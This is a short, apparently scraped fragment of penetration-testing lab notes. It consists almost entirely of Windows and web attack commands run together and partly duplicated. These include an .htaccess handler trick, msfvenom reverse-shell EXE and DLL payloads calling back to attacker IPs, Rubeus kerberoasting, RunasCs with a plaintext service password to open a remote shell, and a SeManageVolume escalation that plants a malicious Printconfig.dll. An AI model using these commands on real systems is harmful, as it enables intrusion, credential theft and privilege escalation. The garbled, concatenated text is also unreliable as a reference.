Access
80
echo "AddType application/x-httpd-php .evil" > .htaccessmsfvenom -p windows/x64/shell_reverse_tcp -f exe LHOST=192.168.45.186 LPORT=4444 > reverse.exe

Last updated
echo "AddType application/x-httpd-php .evil" > .htaccessmsfvenom -p windows/x64/shell_reverse_tcp -f exe LHOST=192.168.45.186 LPORT=4444 > reverse.exe

Last updated
.\Rubeus.exe kerberoast /nowrap /tgtdelegimport-module .\Invoke-RunasCs.ps1Invoke-RunasCs svc_mssql trustno1 cmd.exe -remote 192.168.45.167:1234SeManageVolumeExploit.exemsfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dllcopy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)SeManageVolumeExploit.exemsfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.190 LPORT=4444 -f dll -o Printconfig.dllcopy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\